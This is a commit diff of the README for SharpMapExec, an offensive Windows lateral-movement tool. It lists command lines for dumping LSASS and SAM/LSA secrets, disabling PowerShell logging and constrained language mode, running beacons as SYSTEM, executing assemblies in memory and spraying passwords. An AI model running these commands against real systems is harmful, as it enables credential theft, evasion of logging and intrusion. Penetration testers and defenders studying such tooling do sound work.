crash.software
Projects
Pull Requests
Issues
Builds
SharpMapExec
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY SharpMapExec Commits 465a8eed
🤬
  • .vs/SharpMapExec/v16/.suo
    Binary file.
  • ■ ■ ■ ■ ■
    README.md
    skipped 7 lines
    8 8   
    9 9   
    10 10   
    11  -You can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use [Rubeus](https://github.com/GhostPack/Rubeus) to import/ask for the ticket. If NTLM is specified, it tool will create threads and use [SharpKatz](https://github.com/b4rtik/SharpKatz) to run SetThreadToken if an NTLM hash is specified, and if a password is specified, it will go with ordinary c# impersonation.
     11 +You can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use [Rubeus](https://github.com/GhostPack/Rubeus) to import/ask for the ticket. If NTLM is specified, the tool will use [SharpKatz](https://github.com/b4rtik/SharpKatz) `SetThreadToken` or `LogonUser` impersonation.
    12 12   
    13 13  ```
    14 14  SharpMapExec.exe
    15 15   usage:
    16 16   
     17 + --- Cim ---
     18 + Need plaintext password or the /impersonate flag
     19 + SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET
     20 + 
     21 + Available Cim modules
     22 + /m:enable_winrm (Runs Enable-PSRemoting -Force)
     23 + /m:disable_winrm (Runs Disable-PSRemoting -Force)
     24 + /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
     25 + /m:disable_pslogging (Modify registry to disable PowerShell Logging)
     26 + /m:check_pslockdown (Check __PSLockdownPolicy registry)
     27 + /m:check_pslogging (Check PowerShell Logging registry)
     28 + 
     29 + --- Reg32 ---
     30 + SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
     31 + SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
     32 + 
     33 + Reg32 modules
     34 + /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
     35 + /m:check_pslockdown (Check __PSLockdownPolicy registry)
     36 + /m:check_pslogging (Check PowerShell Logging registry)
     37 + 
    17 38   --- Smb ---
    18 39   SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
    19 40   SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
    20 41   
    21  - Available Smb modules
    22  - /m:shares
     42 + Smb modules
     43 + /m:shares (Scan for accessible Smb shares)
    23 44   
    24 45   --- WinRm ---
    25 46   SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
    26 47   SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
    27 48   
    28  - Available WinRm modules
     49 + WinRm modules
    29 50   /m:exec /a:whoami (Invoke-Command)
    30 51   /m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
    31  - /m:exec /a:C:\beacon.exe /delegwalk (Invoke-Command as all signed in users)
    32  - /m:comsvcs (Dump and Parse Lsass Process)
     52 + /m:comsvcs (Dump & parse lsass)
    33 53   /m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
    34  - /m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
    35  - /m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
    36  - /m:download /path:C:\file /destination:file (Download File from Host)
     54 + /m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
     55 + /m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
     56 + /m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
     57 + /m:download /path:C:\file /destination:file (Download file from host)
     58 + /m:upload /path:C:\file /destination:file (Upload file to host)
    37 59   
    38 60   --- Domain ---
    39 61   SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
    40 62   SharpMapExec.exe tgtdeleg
     63 + 
     64 + --- Ldap ---
     65 + SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
     66 + SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
     67 + 
     68 + Ldap modules
     69 + /m:spraydata (Download user and password policy)
    41 70  ```
    42 71   
    43 72  ### Smb
    44 73   
    45  -Can be used to scan for admin access and accessible Smb shares.
     74 +Can be used to scan for admin access, accessible Smb shares, Smb version and relay signing.
    46 75   
    47  -Modules;
    48 76  ````
    49 77  /m:shares (Scan enumerated shares for access)
    50 78  ````
    skipped 2 lines
    53 81   
    54 82  The beast. It has built-in Amsi bypass, JEA language breakout, JEA function analysis. Can be used for code execution, scaning for PsRemote access, vulnerable JEA endpoints, and data exfiltration.
    55 83   
    56  -Modules;
    57  - 
    58 84  ````
    59 85  /m:exec /a:whoami (Invoke-Command)
    60 86  /m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
    skipped 8 lines
    69 95   
    70 96  Currently supports domain password spraying and to create a TGT for the current user that can be used with the `/ticket` parameter to get the current context.
    71 97   
     98 +### Ldap
     99 + 
     100 +Download necessary data before pw spraying
     101 + 
     102 +```
     103 +/m:spraydata (Download user and password policy)
     104 +```
     105 + 
     106 + 
     107 + 
    72 108  ### Example usage
    73 109   
    74 110  For easy or mass in-memory execution of C# assemblies
    skipped 20 lines
    95 131   
    96 132  ![](images/delegwalk.png)
    97 133   
    98  -Scan for SMB signing and SMBv1, Danke Pingcastle
     134 +Scan for SMB signing and SMBv1
    99 135   
    100 136  ![](images/smbvscan.png)
    101 137   
    skipped 21 lines
    123 159  * [SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump) [@G0ldenGunSec](https://twitter.com/G0ldenGunSec)
    124 160  * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
    125 161  * [Pingcastle ](https://github.com/vletoux/pingcastle) [@mysmartlogon](https://twitter.com/mysmartlogon)
     162 +* [SharpSpray](https://github.com/jnqpblc/SharpSpray)
     163 + 
    126 164   
  • SharpMapExec/Program.cs
    Content is identical
Please wait...
Page is in error, reload to recover